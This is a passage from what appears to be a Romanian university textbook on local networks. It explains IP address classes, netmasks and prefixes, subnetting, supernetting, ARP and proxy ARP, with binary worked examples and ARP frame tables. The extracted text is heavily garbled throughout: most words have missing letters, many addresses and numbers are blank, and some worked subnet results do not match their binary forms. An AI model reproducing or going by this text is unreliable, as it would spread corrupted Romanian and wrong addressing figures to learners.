de de iţi , î les eşte i ple e ta ea eţelelo IP / MPL“ MultiProtocol Label Switching).
3.1.3 Clase de adrese

O ad esă IP este u şi de de iţi e ide tifi ă două lu u i: o eţea şi o staţie î ad ul
a elei eţele.
Pe t u a si plifi a utiliza ea ad eselo IP se foloseşte fo atul de imal. Astfel, o ad esă IP
dată: , se î pa te ai î tâi î g upu i de âte iţi:
. . . şi apoi fie a e g up este o e tit î siste ze i al:
177.4.22.8.
Deşi a eastă ouă e p i a e î les eşte se ifi ati lu ul u ad ese IP, adu e şi u ele
li ită i î uşu i ţa de a dis e e po ţiu ea de eţea şi ea de staţie di ad ul ad esei IP,
pe t u azu ile î a e su t defi ite su eţele. Î e a ea de a păst a ep eze ta ea ze i alǎ
ca model de refe i ţă pe t u IP şi, î a elaşi ti p de a pu e î e ide ţǎ disti ţia di t e ele
două o po e te a dus la defi i ea laselo de ad ese IP.
Odată u defi i ea p i elo t ei lase pe t u uta e a ai fost defi it u spaţiu de ad ese
folosit pentru adresarea multicast, anume clasa D. Restul adreselor vor constitui clasa E,
reprezentând adrese rezervate. În 3-1 su t p eze tate ele i i lase defi ite pe t u spaţiul
de adrese IP.
Nr. iți Nr. de Nr. iți Domeniul de

Clasa Pri ii iți Nr. stații
rețea rețele stație valori
A 1.0.0.0 –
0… 8 27 24 224-2
126.255.255.255
B 128.0.0.0 –
10…. 16 214 16 216-2
191.255.255.255
C 192.0.0.0 –
110… 24 221 8 28-2
223.255.255.255
D 1110… Adrese multicast
E 11110… Rezervat
3-1: “pațiul de adrese IP
96 | ‘ e ţ e l e L o a l e
Clasa A a fost p oie tată pe t u a satisfa e e i ţele idi ate de eţelele de a i

di e siu i. Astfel, pe t u defi i ea eţelei a fi folosit doa p i ul o tet, pe t u ide tifi a ea
staţiei fii d dispo i ili de iţi, eea e ofe ă ai ult de , ilioa e de posi ilităţi. În
figura de mai sus se poate o se a ă do e iul de alo i pe t u lasa A u i lude eţelele
. . . şi . . . , a estea fii d eze ate. Clasa de ad ese . . . u este folosită dato ită
posi ilelo o fuzii u utele i pli ite, î e e e lasa . . . este eze ată pe t u
adrese de loopback, î s opul o ito iză ii şi testă ii.
Tot din 3-1 se o se ă eli i a ea a âte două ad ese di t e ele e pot fi alo ate staţiilo ,
pe t u fie a e di t e lasele uta ile. Cele două ad ese su t: ad esa de eţea şi ad esa de
difuzare.
O adresă IP de reţea este o ad esă pe t u a e toţi iţii de staţie su t .
O astfel de ad esă este folosită pe t u ide tifi a ea î t egii eţele. A easta este, de fapt,
pa tea ele a tă a o i ă ei ad ese de staţie e ălăto eşte peste I te et pe t u toate
routerele de pe parcurs.
O adresă IP de difuzare sau ad esă de oad ast este o ad esă pe t u a e toţi iţii de
staţie su t . U pa het desti at u ei astfel de ad ese a aju ge la toate staţiile di a ea
eţea.
O lasă de ad ese B este defi ită de alo ile p i ilo doi iţi di ad esa IP, a eşti p i i doi
iţi fii d . Di a eastă o st â ge e ezultă ă toate ad esele IP ale ă o p i o tet se află
î te şi , adi ă î t e şi , apa ţi u ei lase B.
Câ pul de eţea pe t u o lasă B a up i de p i ii doi o teţi, da deoa e e p i ii doi iţi
ai p i ului o tet su t fi aţi, ă â doa iţi dispo i ili pe t u a ea lase B. Pe t u
defi i ea staţiilo su t folosiţi ulti ii doi o teţi, adi ă iţi. Astfel pot fi o ţi ute .
eţele, fie a e a â d u u ă a i de . de staţii.
Clasa A ‘eţea “taţie

1 2 3 4
Clasa B ‘eţea “taţie

1 2 3 4
Clasa C ‘eţea “taţie

1 2 3 4
Clasa D “taţie
1 2 3 4
3-2: Adresarea IP
Clasa C se defi eşte p i alo a ea p i ilo o teţi pe t u defi i ea eţelei şi doa a

ulti ilo iţi pe t u ide tifi a ea staţiilo di a eeaşi eţea. P i ii t ei iţi di p i ul o tet
t e uie să fie , adi ă aloa ea a estui p i o tet t e uie să se afle î t e şi pe t u
a o ad esă să apa ţi ă u ei lase C.
Nu ă ul eţelelo de lasă C depăşeşte ilioa e, fie a e di t e a estea putâ d să
up i dă de staţii.
Clasa de ad ese D este folosită pe t u eţele multicast. În decursul ultimilor 15 ani au
e istat u e oase sta da de şi p opu e i de sta da diza e pe t u asigu a ea u ei
infrastructuri de multicast, da ealitatea a ului este ă t afi ul de multicast ep ezi tă

doa o foa te i ă po ţiu e di t afi ul t a sfe at î I te et. Cu toate a estea, o e ge ţa
eţelelo de date u ele de telefo ie sau de tele iziu e ofe ă o otă de opti is î legătu ă
u iito ul o u i aţiilo multicast. În Romania abia în anul 2006 a devenit disponibil
comercial serviciul de trasmisiuni de multicast, un singur ISP oferind în acest moment acces la
un M-Bo e aţio al.
Pentru adresa multicast spaţiul de ad ese este plat, toţi ei o teţi fii d folosiţi pe t u
defi i ea ad esei de staţie. Deoa e e p i ii iţi ai p i ului o tet su t fi aţi, şi a u e ,
u ă ul ad eselo de multicast este de 268 milioane. Cu toate acestea au fost definite mai
multe regiuni disju te, egiu i e ite să se eas ă o ie ti e dife ite: de la asigu a ea
i teg ă ii u o i f ast u tu ă de unicast, pâ ă la defi i ea u o spaţii de ad ese de multicast
p i ate. P i ele de ad ese ele up i se î t e . . . şi . . . su t definite ca
apa ţi â d zo ei Local Network Control Block, a eastea fii d ad esele folosite şi de
p oto oalele de uta e: sp e e e plu O“PF eze ă două di t e a este ad ese de multicast:
. . . şi . . . pe t u p o esul de alege e a routerului desemnat, ia ‘IP foloseşte
ad esa . . . pe t u t i ite ea a tualiză ilo .
Clasa de ad ese E este eze ată şi u poate fi folosită î eţelele pu li e sau î soluţii de
multicast.
3.1.4 Masca de reţea

P i folosi ea elo lase utate efi ie ţa utiliză ii spaţiului de adrese IPv4 este una
e t e de edusă. “p e e e plu, pe t u o eţea u odu i a fi alo ată o lasă C, pie zâ du-
se asftfel de ad ese. Î azul u ei eţele de de odu i alo a ea u ei lase B du e la
pierderea a mai mult de 65.000 de adrese, şi hia p i ep oie ta ea eţelei şi sepa a ea sa î
două eţele, se o folosi două lase C, ea e a du e la pie de ea a peste de ad ese.
P oto olul IP i pu e a o i e ad esă să o ţi ă două i fo aţii: o ad esă de eţea şi
ad esa u ei staţii di ad ul a elei eţele. “epa a ea elo două â pu i u t e uie să apa ă la
g a iţa de o tet. Pe t u dete i a ea iţilo e defi es ad esa de eţea se foloseşte u şi de
de iţi de u it as ă de eţea.
Mas a de reţea este u şi de de iţi a e, î o ju ţie logi ă u o ad esă IP, sepa ă
ad esa de eţea, a ulâ d iţii de staţie.
Fie a e it di as a de eţea e o espu de adi ă se află pe a eeaşi poziţie u u it
di â pul de eţea a e aloa e , î e e e toţi iţii o espu zăto i â pului de staţie au
valoarea zero.
E p i a ea ăştii de eţea poate fi ealizată î fo a ze i alǎ sau sub forma unui prefix
de eţea. Î azul e p i ă ii ze i ale ei de iţi su t sepa aţi î g upu i de , apoi
realizându-se conversia în zecimal. Procesul este unul similar cu exprimarea zecimalǎ a
adresei IP.
O altă ep eze ta e a ăştilo de eţea este su fo a u ui u ă a e i di ă u ă ul de
iţi de o se uti i di as a de eţea. A est tip de ep eze ta e poa tă u ele de prefix de
rețea.
Pentru exemplificare, fie ad esa IP: . . . şi as a: . . . . Mas a de
eţea este e hi ale tă u prefixul /20. Pentru a east e e plu â pul de eţea a up i de
p i ii de iţi, ia â pul de staţie ulti ii . Ad esa eţelei se o ţi e p i ope aţia de ŞI
logi î t e as ă şi ad esa IP: . . . / .
Ad esa de difuza e se o ţi e p i o pleta ea tutu o iţilo di â pul de staţie u alo i
de 1. Adresa de difuzare va fi: 141.85.63.255/20.
98 | ‘ e ţ e l e L o a l e
Pe t u a eeaşi ad esă, da folosi d p efi ul / ad esa de eţea a fi: . . . / , ia

adresa de difuzare: 141.85.37.191/26.
reţea staţie
1000 1101.0101 0101.0010 0101.10 00 0101 - 141.85.37.133
1111 1111.1111 1111.1111 1111.11 00 0000 – 255.255.255.192 - /26
---------------------------------------
1000 1101.0101 0101.0010 0101.10 00 0000 – 141.85.37.128/26 - reţea
1000 1101.0101 0101.0010 0101.10 11 1111 – 141.85.37.191/26 - difuzare
Este i po ta t de o se at ă a eaşi ad esă poate fi ad esă de staţie sau ad esă de

difuza e î fu ţie de as a de eţea aleasă.
3.1.5 Subreţele
Totalitatea odu ilo e pot o u i a î t e ele folosi d dispoziti e de i el fizi şi legătu ă
de date de e e plu: epetoa e şi s it hu i defi es o eţea lo ală. Altfel spus, o eţea lo ală
va cuprinde totalitatea echipamentelo de eţea e pot o u i a fă ă i te edie ea u ui
router.
O eţea lo ală oi ide u u do e iu de difuza e. Astfel, toate staţiile di a eaşi eţea
lo ală o p i i pa hetele de broadcast.
Di oti e de se u itate, da şi pe t u opti iza ea o su ului de a dă î ad ul u ei
eţele lo ale, u ad i ist ato poate de ide sepa a ea u o se ţiu i di eţea î su eţele
dife ite. Pe t u asigu a ea ad esă ii a t e ui să î pa tă spaţiul i iţial de ad ese î ai ulte
se ţiu i disju te.
Ate ţie! Disti ţia î t e „ eţele şi „su eţele este u a pu isto i ă. „‘eţele e au
de u ite doa spaţiile de ad ese e o espu deau laselo A, B şi C. Î p eze t oţiu ile su t
folosite interschimbabil.
Pe t u a î pă ţi spaţiul de ad ese . . . / î două ju ătăţi se po eşte de la
ep eze ta ea i a ă a spaţiului i iţial, apoi su t deli itate â pu ile de eţea şi staţie. Din
â pul de staţie o fi a aţi u u ă de iţi pe t u defi i ea de su eţele. A eşti iţi o
defi i u ou â p u it â p de su eţea.
reţea staţie
10010000.00000001.00101 000.0000 0000 - 144.1.40.0/21
10010000.00000001.00101 000.0000 0000 - 144.1.40.0/22 -prima subreţea
10010000.00000001.00101 100.0000 0000 - 144.1.48.0/22 -a doua subreţea
subreţea
Pe t u a î pă ţi spaţiul . . . / î su eţele, se aută ea ai ap opiată pute e a

lui egală sau ai a e u u ă ul de su eţele ăutat. Astfel pe t u a o ţi e su eţele a
t e ui să î pă ţi spaţiul de ad ese î se ţiu i egale. P efi ul de eţea pe t u fie a e di t e
cele su eţele a fi / , adi ă p efi ul spaţiului i iţial la a e se adaugă u ă ul de iţi
necesar pentru a reprezenta cele 8 valori diferite.
reţea staţie
10010000.00000001.001011 00.0000 0000 - 144.1.40.0/22
10010000.00000001.001011 00.0000 0000 - 144.1.40.0/25 –prima subreţea
10010000.00000001.001011 00.1000 0000 - 144.1.48.0/25 –a doua subreţea
[...]
10010000.00000001.001011 11.1000 0000 - 144.1.48.0/25 –a opta subreţea
subreţea
O dez ate e î ă î tâl ită î e o a dă ile legate de alocarea adreslor IP este cea
efe itoa e la folosi ea p i ei şi ulti ei su eţele. Î lipsa p e iză ii ăştii de eţea, ad esa
p i ei su eţele poate fi o fu dată u ad esa spaţiului i iţial. Î od si ila ad esa de
difuza e a ulti ei su eţele poate fi o fu dată u ad esa de difuza e a spaţiului i iţial. Pe t u
e e plu de ai sus . . . poate fi o i ad esa de eţea i iţială, da ă p efi ul este / , o i
p i a su eţea, da ă p efi ul este / . Ad esa . . . este ad esa de difuza e pe t u
întreg spaţiul i iţial pe t u p efi ul / , sau ad esa de difuza e a ulti ei su eţele pe t u / .
Di pă ate, e ita ea folosi ii p i ei şi a ulti ei su eţele du e la o pie de e î se ată de
ad ese. Astfel, soluţia ea ai ăspâ dită î eţelele a tuale este de a folosi p i a şi ulti a
su eţea, da u p e iza ea p efi ului sau a ăştii de eţea pe t u o i e ad esă IP.
3.1.6 Super-reţele
Di e siu ea ta elei de uta e afe tează atât late ţa p o esului de găsi e a ăii opti e,
ât şi esu sele ha d a e e esa e pe tru router (memorie, procesor). Pentru reducerea
u ă ului de ute se poate folosi p o esul de ag ega e a spaţiilo de ad ese.
Ag ega ea de ad ese este p o esul i e s î pă ţi ii î su eţele.
Î e e plul de ai jos su t p eze tate spaţii de ad ese alese spe ial a să dife e doa
p i ei ai puţi se ifi ati i doi iţi ai â pului de eţea.
reţea staţie
1011 1110.0001 0100.0000 0100.0000 0000 - 190.20.4.0/24
1011 1110.0001 0100.0000 0101.0000 0000 - 190.20.5.0/24
1011 1110.0001 0100.0000 0110.0000 0000 - 190.20.6.0/24
1011 1110.0001 0100.0000 0111.0000 0000 - 190.20.7.0/24
-------------------------------------------------------
1011 1110.0001 0100.0000 0100.0000 0000 - 190.20.4.0/22
3-6: Agregarea a 4 clase C
Cele 4 clase din tabel sunt în fapt sfe tu ile u ui si gu spaţiu de ad ese. Ad esa ag egată,
sau super- eţeaua e up i de ele lase, se o ţi e î a est az edu â d as a de eţea u
doi iţi. A eşti doi iţi o fi fă uţi ze o, t e â d î â pul de staţie, pe t u a dete i a
adresa de eţea ag egată.
Este i po ta t de p e izat ă deşi . . . / este u spaţiu alid de ad ese, u poate fi
folosit pentru alocarea de adrese într-o si gu ă eţea. Î alo a ea ad eselo u se pot folosi
super- eţele ale elo lase utate. Astfel, . . . / este o su eţea di eţeaua de lasă
B . . . / şi poate fi folosit pe t u alo a ea î t -o si gu ă eţea, da . . . / este
o super- eţea e up i de lase C, ia ad ese di a est spaţiu pot fi alo ate u ai după o
î pă ţi e î su eţele.
Prefixul unei adrese IP valide nu poate fi mai mic decât prefixul clasei din care face parte
espe ti a ad esă.
Nu o i e două eţele pot fi ag egate î t -o super- eţea. Astfel, pe t u a putea p ofita de
a eastă fa ilitate adusă de VL“M, alo a ea ad eselo t e uie fă ută judi ios u doa î
i te io ul eţelei de ăt e ad i ist ato ul de eţea, i şi la i elul I“P-u ilo şi hia la i el de
ţa ă. Di pă ate, î ‘o â ia a a tajele edu e ii ta elelo de uta e p i ag ega ea eţelelo ,
ca o consecinţă a alo ă ii pla ifi ate a ad eselo de eţea, au fost o ştie tizate e t e de
târziu, astfel încât în tabelele de rutare ale marilor ISP-uri din România mai frecvent se
î tâl es p efi e de / de ât p efi e / , u a fi fost de aşteptat la o ţa ă de dimensiunile
României.
100 | ‘ e ţ e l e L o a l e
3.1.7 ARP
În prezent p oto olul de ezoluţie a ad esei – A‘P este ăzut adesea a o o po e tă
ese ţială a a hite tu ii TCP/IP, da lu u ile u au stat di totdeau a aşa. Î eputul a ilo a
ep eze tat o pe ioadă a ată de i e titudi i î eea e p i eşte sta da diza ea
p oto oalelo pe t u eţelele de al ulatoa e. Da ă la i elul eţelelo lo ale IEEE a euşit să
edu ă alege ea la t ei sta da de: Ethe et, Toke ‘i g şi Toke Bus, o u i aţia î t e a este
eţele t e uia asigu ată ori de IP ori de CLNS (Connectionless Network Service). Nici anii ce au
u at u au i pus p oto olul IP a p i ipalul âştigăto la i elul eţea de la î eputul a ilo
, o petiţia desfăşu â du-se î t e IP şi IPX sau Apple Talk.
Pe t u legătu ile pu t-la-pu t u e istă nicio dife e ţă î t e o u i aţia u i ast şi
oad ast. Di a est oti , pe t u legătu ile pu t-la-punct nu este necesar un mecanism
pentru determinarea adresei de nivel 2, folosindu-se doar adresa de difuzare. Ethernetul este
î să u ediu ultia es, putâ d e ista ai ulte desti aţii î ad ul a eleaşi eţele lo ale.
A‘P a fost sta da dizat de IETF î p i ‘FC şi ep ezi tă e a is ul pe t u
asigu a ea o u i aţiei u i ast î t -o i f ast u tu ă ultia es. Astfel, A‘P şi-a p opus să
ofe e odalitatea de aso ie e a u ei pe e hi <ad esă de eţea, p oto ol de eţea> u o ad esă
u i ă de i el legătu ă de date. Deşi sta da dul p e ede posi ilitatea fu ţio ă ii A‘P î
o ju ţie u o a ietate de p oto oale de i el eţea, î p a ti ă a esta a de e it o
o po e tă i teg a tă a sti ei de p oto oale TCP/IP/Ethe et. P i u a e, p i ipala
apli a ilitate a p oto olului A‘P a fost şi ă â e dete i a ea o espo de ţelo î t e
ad esele IP şi ad esele MAC.
A‘P se azează pe o st ui ea şi e ţi e ea u ei tabele ARP. O ta elă A‘P a e olul de a
păst a o espo de ţele î ăţate î t e ad esele IP şi ele MAC. A estea su t o st uite di a i
şi su t sto ate î e o ia ‘AM. Deşi e istă e a is e pe t u adăuga ea stati ă sau
eliminarea unei i t ă i î t -o ta elă A‘P, su t a e situaţiile î a e u ad i ist ato de eţea
va apela la ele.
Fie a e o pute sau dispoziti de eţea îşi păst ează p op ia sa ta elă A‘P, î ealitate
e istâ d âte o ta elă A‘P pe t u fie a e i te faţă a ti ă. Astfel, un router u t ei i te feţe
Ethe et a e ţi e t ei ta ele A‘P disti te.
Cu fu ţio ează ARP? Cu este o st uită ta ela ARP?
Pe t u a ealiza o figu aţiile de eţea ale u ei staţii o t e uit p e izaţi i i pat u
parametri: ad esa IP a staţiei, as a de eţea, ad esa routerului i pli it default gate a şi
adresa IP a serverului de DNS.
“e e ul de DN“ este folosit pe t u a o ţi e ad esa IP a desti aţiei po i d de la u ele
acesteia, spre exemplu o interogare de DNS va indica faptul ă www.cs.pub.ro este asociat cu
adresa 141.85.37.5.
Datele de la i elul apli aţie o fi p elu ate î o fo itate u ope aţiile spe ifi e
i elu ilo p eze ta e şi sesiu e da ă e azul după care vor fi încapsulate la nivelul transport,
precizându-se cel mai adesea tipul se i iului po tul su să, po tul desti aţie . U ează
î apsula ea i elului eţea a e a ataşa a tetul IP, a tet e a o ţi e i fo aţiile legate de
ad esa IP su să şi ad esa IP desti aţie, a easta di u ă fii d î ge e al o ţi ută î u a unei
ezoluţii de DN“. Pe t u o st ui ea a tetului de i el legătu ă de date a t e ui dete i ată
ad esa MAC desti aţie.
Ad esele de i el legătu ă de date au ele a ţă lo ală, u şi ele a ţă glo ală p e u
ad esele de i el eţea. Di a est oti ad esa MAC desti aţie di a tetul de i el doi a fi
a eeaşi u ad esa MAC a desti aţiei doa î azul î a e a easta se află î a eeaşi eţea lo ală.
Alt i te i, di pu tul de ede e al eţelei lo ale, ad esa MAC desti aţie a fi ad esa p i ului
router ăt e desti aţie, deoa e e o i e router a ă gi i eţeaua lo ală. Astfel, î ai te de a

ăuta î ta ela A‘P, a t e ui dete i ată a e este u ătoa ea desti aţie.
Pe t u p i ul pas î p o esul de ezoluţie a ad esei a t e ui dete i at da ă desti aţia
se află î a eaşi eţea lo ală. Pe t u a easta se apli ă as a de eţea atât ad esei desti aţie
ât şi ad esei su să, ia da ă ezultatele ope aţiilo de ŞI logi oi id, se va considera ă su sa
şi desti aţia se află î a eaşi eţea lo ală. Î azul a esta î ta ela A‘P a fi ăutată di e t
ad esa MAC a desti aţiei, po i d de la ad esa IP desti aţie. Da ă ta ela A‘P u o ţi e nicio
i t a e aso iată u ad esa IP desti aţie, odul su să a te po iza î tâ zia î apsula ea
datelo şi a ea u ad u ou, u it cerere ARP. Acest nou cadru va fi un cadru de difuzare
la i el legătu ă de date deoa e e ad esa MAC a desti aţiei u este u os ută , da a a ea î
â pul de date i fo aţii desp e ad esa IP desti aţie. Nodul desti aţie a ide tifi a ad ul
drept o cere e A‘P, îşi a a tualiza ai î tâi ta ela p op ie, ia apoi a t i ite u ad u, u it
răspu s ARP, ce va fi unicast atât la i el legătu ă de date, ât şi la i elul eţea. Pe aza
a estui ad u su sa îşi a a tualiza p op ia ta elă A‘P a î apsula a tetul de i el legătu ă de
date şi a t i ite ad ul.
3-7: Studiul ARP
Pe t u ai ultă la itate se va folosi folosi topologia din figura de mai sus pentru a
u ă i o st ui ea ta elelo A‘P.
Î ai te de t e e ea la i elul legătu ă de date, ad esa IP desti aţie a fi ăutată î ta ela
A‘P şi efii d găsită se a ea u ad u spe ial o e e e A‘P e a a ea î â pul ad esă
desti aţie di a tet ad esa de difuza e: FF.FF.FF.FF.FF.FF, ia î â pul ad esă su să ad esa
MAC a staţiei A . Î figu a de ai jos este p eze tată st u tu a a estui ad u
Antet Date
MAC dest. MAC Tip cadru cod MAC IP su să MAC dest. IP dest
su să ope aţie su să
FFFF: 0C18: 0x0806 1 0C18: 193.23. 0000: 193.23.
FFFF: 7A11: 7A11: 1.4 0000: 1.7
FFFF 7111 7111 0000
3-8: Cerere ARP
Da ă se va o side a ă eţeaua di figu ă foloseşte Ethernet drept protocol de nivel

legătu ă de date, datele o fi difuzate şi o aju ge la A , la A şi la i te faţa routerului
o e tată la seg e tul A. Antetul cadrului va fi analizat la i elul legătu ă de date de ăt e
toţi e epto ii aflaţi î a elaşi do e iu de difuza e. Câ pul desti aţie fii d o ad esă de
difuza e, ad ul a fi t i is la i elul supe io . Cad ul este ide tifi at d ept o e e e A‘P şi
102 | ‘ e ţ e l e L o a l e
doa staţia i te faţa de eţea a ă ei ad esă IP se egăseşte î â pul de date al ad ului a

i iţia u ăspu s t a s is a u i ast atât la i el eţea, ât şi la i el legătu ă de date.
Totodată, pe aza o ţi utului â pului de date di ad ul de e e e A‘P a fi eată p i a
intrare î ta ela A‘P a staţiei a e s-a e u os ut a şi desti ata î azul de faţă, A2).
Antet Date
MAC MAC Tip cadru cod MAC IP su să MAC IP dest
dest. su să ope aţie su să dest.
0C18: 0C18: 0x0806 2 0C18: 193.23. 0C18: 193.23.
7A11: 7A92: 7A92: 1.7 7A11: 1.4
7111 711B 711B 7111
3-9: Răspu s ARP
După p i i ea ăspu sului, A a putea i se a î ta ela sa A‘P ad esa MAC a lui A , ia

o u i aţia di a est o e t a de u ge fă ă p o le e.
Fiind pe un segment Ethernet, toate ad ele s hi ate de A şi A o ajunge la toate
staţiile de pe seg e t, astfel ă, deşi u au e is niciun ad u, atât A ât şi routerul vor primi
atât e e ea A‘P, ât şi ăspu sul. Cu toate a estea, i i e e ea A‘P, i i ăspu sul u o
du e la a tualiza ea ta elei A‘P, ele două ad e fii d ig o ate. Astfel ta elele elo două
dispoziti e ă â ide.
P oto olul A‘P este u p oto ol de i el legătu ă de date, ia pa hetele sale su t
ide tifi ate folosi d aloa ea î â pul Lu gi e/Tip. A eastă aloa e este ai a e
decât 0x0800, â pul Lu gi e/Tip ide tifi â d tipul p oto olului de i el şi u lu gi ea
cadrului.
Câ pul od ope aţie di zo a de date a ad ului A‘P poate a ea doa pat u alo i, două
folosite de p oto olul A‘P şi două de ‘A‘P. Astfel pe t u aloa ea şi ad ul este
i te p etat a o e e e, espe ti ăspu s A‘P, ia pe t u alo ile şi este i te p etat a o
e e e, espe ti ăspu s ‘A‘P.
După popula ea ta elei A‘P a fi eat şi a tetul de i el legătu ă de date al ad ului e
t e uia t a s is i iţial, după u este p eze tat şi î 3-.
Antet 2 Antet 3 Date

MAC MAC Tip cadru IP dest IP su să
dest. su să
0C18: 0C18: 0x0800 193.23. 193.23.
7A92: 7A11: 1.7 1.4
711B 7111
3-10: Cadrul de date
Cu a e lo o u i aţia î t e staţii aflate î eţele dife ite?

S-a ăzut ă p oto olul de ezoluţie a ad esei se azează pe difuză i la i el legătu ă de
date. Routerele î s hi u p opagă pa hetele de difuza e de i el legătu ă de date î afa a
eţelei di a e p o i .
Reveni d la p i ul pas al p oto olului A‘P, şi a u e la testul apa te e ţei la a eeaşi
eţea a ad esei IP su să şi a ad esei IP desti aţie. Cu alte u i te, da ă ezultatul ope aţiei de
ŞI logi î t e ad esa su să şi as a de eţea dife ă faţă de ezultatul ope aţiei de ŞI logi î t e
ad esa desti aţie şi a eaşi as ă de eţea, se o luzio ează ă su sa şi desti aţia se află î
eţele dife ite. Î a est az, î a tetul de i el a t e ui p e izată ad esa u ăto ului router
aflat pe alea ăt e desti aţie, altfel spus, adresa routerului implicit (default gateway . Da ă î
ta ela A‘P u e istă o i t a e pe t u routerul implicit, atunci va fi trimis un cadru cerere ARP,
pe adresa de difuzare de nivel 2, pentru a afla adresa IP a routerului implicit. Acesta va
ăspu de e e ii, u u ad u u i ast e a fi folosit pe t u a tualiza ea ta elei A‘P pe staţia
su să. Î ele di u ă a fi o st uit a tetul de i el pe t u ad ul de date, astfel î ât
ad esa IP desti aţie a fi ad esa IP a desti aţiei fi ale, da ad esa MAC desti aţie a fi ad esa
MAC a routerului implicit.
Î azul eţelei de ai sus se o side ă ă staţia A ea să o u i e u B . După ope aţia
IP A & as ă A = IP B & as ă A , se dete i ă ă B u se află î a eaşi eţea lo ală.
Astfel A1 va ăuta î ta ela A‘P o o espo de ţă pe t u ad esa routerului i pli it, adi ă
pe t u . . . . Da ă a eastă o espo de ţă u e istă, a t i ite u ad u de e e e A‘P
da a e a a ea p e izat î â pul de date a ad esă IP desti aţie . . . . Cad ul fiind
u ul de difuza e, a fi e epţio at de ăt e toate dispoziti ele de eţea aflate pe a est
seg e t. A şi A o ig o a ad ul, deoa e e a esta a a ea p e izată a ad esă IP desti aţie
altă aloa e de ât ad esele lo . Routerul va trimite un cadrul de ăspu s A‘P si ila u el di
3- ef , î a e MAC su să a fi: . . C. . A.A , ia IP su să a fi . . . .
Pe baza cadrului de cerere ARP, routerul îşi a a tualiza p op ia ta elă A‘P
o espu zătoa e i te feţei di sp e seg e tul A, ia apoi pe aza ad ului de ăspu s A îşi a
adăuga î ta ela A‘P o i t a e ouă, e fa e o espo de ţa î t e 193.23.1.1 şi ad esa MAC a
i te feţei routerului: . . C. . A.A . Di a est o e t staţia A a î apsula t a s isia
desti ată staţiei B folosi d ad esa IP a lui B 24.8.17.2) şi ad esa MAC a i te feţei e a
routerului (00.48.0C.18.7A.A2).
Ad esa desti aţie a folosi routerului pe t u a dete i a i te faţa pe a e t e uie t i is
pa hetul şi astfel p o esul de uta e a dete i a ă pa hetul t e uie t i is pe i te faţa e a
routerului. Routerul a fa e ai î tâi testul da ă i te faţa pe a e t e uie t i is pa hetul este
î a eaşi eţea u desti aţia fi ală a pa hetului. Î azul de faţă IP e & as ă e a da a elaşi
rezultat u IP B & as ă e , astfel a fi ăutată î ta ela A‘P a i te feţei e , o
o espo de ţă pe t u ad esa IP a lui B . Da ă a eastă o espo de ţă u e istă a fi t i isă o
e e e A‘P e a o ţi e ad esa IP desti aţie a staţiei B a desti aţiei fi ale).
Da ă î s hi B u a fi fost î a eaşi eţea u i te faţa e , a fi fost e t asă di uta
folosită ad esa u ăto ului hop, şi ăutată î ta ela A‘P o o espo de ţă pe t u ad esa
u ăto ului hop.
Pe t u topologia di figu ă ef , î u a a două p o ese de e e e/ ăspu s A‘P şi o
es ie e a a tetului de i el ope ată de router, pa hetul a aju ge la desti aţie, a eastă
o u i aţie si plă fii d ealizată p i t i ite ea a u ai puţi de ad e u a tete de i el
2 diferite. În plus, în tabela ARP a staţiei A , a i te feţei e , a i te feţei e şi a staţiei B a fost
adăugată âte o î egist a e
Cu a e lo o u i aţia î t e staţii aflate î eţele dife ite da ă u s-a precizat adresa
routerului implicit?
Pe t u siste ele de ope a e e ulează la i elul staţiilo , lipsa ad esei routerului implicit
e hi alează u li ita ea o u i aţiei la eţeaua lo ală. Pe de altă pa te, î azul routerelor ce
au a i te faţă de ieşi e o eţea de tip ultia es de e e plu Ethernet , da u au p e izată şi
adresa următo ului router t e uie ăutat u alt e a is pe t u a asigu a ieşi ea di eţeaua
lo ală. U az si ila este şi el al u o dispoziti e dedi ate e ulează siste e de ope a e
o oliti e, u i ple e tă i pa ţiale ale sti ei TCP/IP dato ită esu selo ha dware mult mai
li itate de ât î azul al ulatoa elo pe so ale de e e plu aşi i de a at, auto ate de
afea, et . . Atât pe t u ute i o plet spe ifi ate, ât şi pe t u i ple e tă i pa ţiale ale
sti ei TCP/IP u a ai e ista dife e ţă î t e o u i aţia î t e odu i di a eaşi eţea lo ală şi
104 | ‘ e ţ e l e L o a l e
o u i aţia î t e odu i aflate î eţele dife ite. “taţiile u o ai a ea e oie de ât de

p e iza ea ad esei IP, pe t u o i e ad esă IP desti aţie u â d să i iţieze o e e e A‘P.
“oluţia se azează pe ula ea la nivelul routerului de ieşi e di eţeaua lo ală a se i iului
de proxy ARP.
Proxy ARP este o e te sie a p oto olului de ezoluţie a ad esei. Po i d de la faptul ă
routerul nu va transfera pachetele de difuzare, Proxy ARP va determina routerul să ăspu dă
la toate e e ile A‘P desti ate u o ad ese î afa a eţelei u ad esa MAC a i te feţei
o e tate î a ea eţea.
Este i po ta t de su li iat ă, deşi pe t u o ad esă IP dată u poate e ista ai ult de o
si gu ă i t a e î ta ela A‘P, ai ulte ad ese IP pot fi aso iate u o si gu ă ad esă MAC,
a est fapt fă â d posi ilă fu ţio a ea o u i aţiei p i Proxy ARP.
Î topologia folosită a te io , pe t u a pe ite o u i aţia î t e A şi B folosi d p o
A‘P, testul de apa te e ţă î a eaşi eţea u ai poate fi fă ut la i elul staţiei, deoa e e
a easta u ai a e dispo i ilă o as ă de eţea. A a i iţia u ad u de e e e A‘P, e a
a ea a ad esă IP desti aţie B şi u ad esa IP a i te feţei e0). Cererea va ajunge la toate
staţiile o e tate î eţeaua lo ală, da A şi A o o ig o a e e u os â d ad esa IP
desti aţie. Routerul în schimb, rulând proxy ARP, a testa ai î tâi da ă e e ea A‘P este
desti ată u ei staţii aflate î afa a eţelei di a e p o i e. Testul a folosi as a şi ad esa
interfeţei pe a e a fost p i ită e e ea, p e u şi ad esa IP desti aţie. Cu
IP B & as ă e este dife it de IP e & as ă e , routerul a de ide ă desti aţia se află î
altă eţea. Î a est az routerul a t i ite ad ul de ăspu s A‘P folosi d a ad esă su să de
i el eţea ad esa desti aţiei fi ale î azul de faţă adresa lui B1 - . . . , şi ad esa de
MAC a i te feţei de ieşi e di eţea, adi ă . . C. . A.A . Totodată, routerul îşi a adăuga
î ta ela A‘P a i te feţei e o espo de ţa î t e C. . A. . . şi . . . , ia A îşi a
adăuga î ta ela A‘P i t a ea e aso iază . . C. . A.A u . . . .
Cad ul de date a fi î apsulat apoi folosi d ta ela A‘P, p e izâ d a ad esă IP desti aţie
. . . , ia a ad esă MAC desti aţie . . C. . A.A , e a t a şi î azul folosi ii u ui
router implicit.
Router implicit vs. Proxy ARP?
Spre deosebire de Proxy ARP, î a e e e ea A‘P este ad esată staţiei desti aţie, î azul
p e iză ii routerului i pli it e e ea A‘P este ad esată di e t routerului. În cazul proxy ARP
